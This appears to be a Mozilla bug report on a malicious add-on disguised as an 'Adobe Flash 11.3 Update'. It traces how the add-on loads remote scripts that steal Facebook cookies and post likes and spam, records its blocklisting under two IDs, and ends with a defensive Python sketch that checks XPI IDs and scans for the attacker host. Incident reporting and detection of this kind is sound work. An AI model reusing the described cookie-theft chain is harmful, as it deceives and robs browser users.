Malicious "Adobe Flash 11.3 Update" add-on

RESOLVED FIXED

Status


Toolkit
Blocklisting
6 years ago
7 days ago

People

(Reporter: MarkH, Assigned: jorgev)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

7.63 KB, application/octet-stream
(Reporter)

Description

6 years ago
Created attachment 592890
20120130 Adobe Update.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.77 Safari/535.7

Steps to reproduce:

Downloaded the "Adobe Flash 11.3 Update" add-on from http://oibruvv.com/flash@adobe.com.xpi


Actual results:

After install, it injects main.js from the addon, which injects http://oibruvv.com/ffunctions.js

ffunctions.js injects a script tag to load http://oibruvv.com/track.php

Track.php injects script tags to load:

http://oibruvv.com/likepage.php
http://oibruvv.com/wallpost.php

The likepage.php steals your FB cookies and sends likes. It was configured to like this one: 340392035980023

Wallpost.php is configurable, based on the GET params you pass to it.  It will build a custom JS file with your spam message and URL.



Expected results:

It shouldn't steal cookies from the browser and send likes to Facebook without the user's knowledge.
(Assignee)

Comment 1

6 years ago
Id: flash@adobe.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

6 years ago
The id is safe to block, as far as I can see.

https://addons.mozilla.org/en-US/firefox/blocked/i56
Status: ASSIGNED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED

Comment 3

6 years ago
This add-on changes its ID to avoid the blocklisting: flashupdate@adobe.com
See http://www.geckozone.org/forum/viewtopic.php?f=5&t=103030&p=678608#p678589
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
(Assignee)

Comment 4

6 years ago
Please file a new bug when it has a different ID. It's easier for us to track.
https://addons.mozilla.org/en-US/firefox/blocked/i68
Status: REOPENED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
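
Comment 3 shows the limit of blocking by ID alone: the same add-on came back as flashupdate@adobe.com. The following triage sketch is an added example, not code from this bug or from Mozilla's blocklist; it checks an XPI's manifest ID and, independently of the ID, the remote script host named in the description. It assumes a legacy XPI with `install.rdf` at the archive root, and `build_sample` builds a constructed sample rather than the attachment from this bug.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RDF = "{http://www.w3.org/1999/02/22-rdf-syntax-ns#}"
EM = "{http://www.mozilla.org/2004/em-rdf#}"
BLOCKED_IDS = {"flash@adobe.com", "flashupdate@adobe.com"}  # both IDs from this bug
BAD_HOSTS = {"oibruvv.com"}                                 # host from this bug
HOST_RE = re.compile(rb"https?://([a-z0-9.-]+)", re.I)
MAX_JS = 5_000_000  # assumed cap: skip oversized entries instead of inflating them

def addon_id(install_rdf):
    """Return em:id of the install manifest (child element or attribute form)."""
    if b"<!ENTITY" in install_rdf:  # refuse entity declarations in untrusted XML
        return None
    try:
        root = ET.fromstring(install_rdf)
    except ET.ParseError:
        return None
    for desc in root.iter(RDF + "Description"):
        if "urn:mozilla:install-manifest" in (desc.get("about"), desc.get(RDF + "about")):
            return (desc.findtext(EM + "id") or desc.get(EM + "id") or "").strip() or None
    return None

def triage_xpi(data):
    """Return (id, findings) for XPI bytes; the host check ignores the ID."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as xpi:
        has_rdf = "install.rdf" in xpi.namelist()
        ext_id = addon_id(xpi.read("install.rdf")) if has_rdf else None
        if ext_id in BLOCKED_IDS:
            findings.append("blocked-id")
        for info in xpi.infolist():
            if not info.filename.endswith(".js") or info.file_size > MAX_JS:
                continue
            hosts = {h.decode().lower() for h in HOST_RE.findall(xpi.read(info))}
            for host in sorted(hosts & BAD_HOSTS):
                findings.append(f"remote-script-host:{host}:{info.filename}")
    return ext_id, findings

def build_sample(ext_id):
    """Constructed sample XPI with a given ID (not the attachment from this bug)."""
    rdf = (f'<RDF xmlns="{RDF[1:-1]}" xmlns:em="{EM[1:-1]}">'
           f'<Description about="urn:mozilla:install-manifest"><em:id>{ext_id}</em:id>'
           '</Description></RDF>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", rdf)
        z.writestr("main.js", 'load("http://oibruvv.com/ffunctions.js");')
    return buf.getvalue()
```

With a constructed ID that is on neither block entry, the ID check stays silent while the host indicator still fires.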